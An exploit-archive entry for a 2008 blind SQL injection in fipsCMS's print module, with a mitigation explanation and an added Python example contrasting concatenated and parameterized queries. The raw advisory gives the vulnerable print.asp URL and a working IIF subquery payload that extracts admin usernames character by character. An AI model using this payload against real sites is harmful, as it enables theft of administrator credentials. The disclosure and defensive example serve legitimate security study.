Vendor: fipsCMS
By: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: fipsCMS
Affected Version From: fipsCMS [Print Module]
Affected Version To: fipsCMS [Print Module]
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Blind SQL Injection

Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but the code that is vulnerable to SQL injection has not been fixed.

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.
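
An added example (not code from the advisory or from fipsCMS) showing the true/false response difference described above and how input validation plus a parameterized query removes it. Python with SQLite stands in for the ASP/Access stack; the table, column and function names are assumptions, as is `lg` being a numeric language id.

```python
import re
import sqlite3

# Constructed sample data: SQLite stands in for the Access database behind the
# ASP print module; table and column names are assumptions, not fipsCMS's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (lang_id INTEGER, body TEXT)")
    db.execute("INSERT INTO pages VALUES (1, 'Printable page, language 1')")
    return db

GENERIC_ERROR = "Page not available"  # the only thing a user sees on failure

def print_page_vulnerable(db, lg):
    # 'Before' form: the request value is concatenated into the statement, so
    # any boolean expression appended to lg is evaluated by the database.
    sql = "SELECT body FROM pages WHERE lang_id = " + lg
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return GENERIC_ERROR
    return row[0] if row else GENERIC_ERROR

def print_page_hardened(db, lg):
    # Input validation: lg must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,4}", lg):
        return GENERIC_ERROR
    # Parameterized query: the value is bound as data, never parsed as SQL.
    row = db.execute(
        "SELECT body FROM pages WHERE lang_id = ?", (int(lg),)
    ).fetchone()
    return row[0] if row else GENERIC_ERROR

def leaks_boolean(handler, db):
    # Two requests that differ only in an always-true vs always-false condition.
    # Different responses mean the page answers true/false questions.
    return handler(db, "1 AND 1=1") != handler(db, "1 AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks:", leaks_boolean(print_page_vulnerable, db))
    print("hardened leaks:  ", leaks_boolean(print_page_hardened, db))
```

The generic error message is identical in both handlers; only the hardened one gives the same response regardless of the condition, which is why hiding errors alone does not mitigate the flaw.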
Source

Exploit-DB raw data:

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Blind SQL Injection
 
Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]

Application :: fipsCMS [Print Module]
 
Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73 

Dork 1 ::  Use ur mind !
 
ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL]

Example : //IIF((select%20mid(last(username),1,1)%20
from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko')

 
-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-07]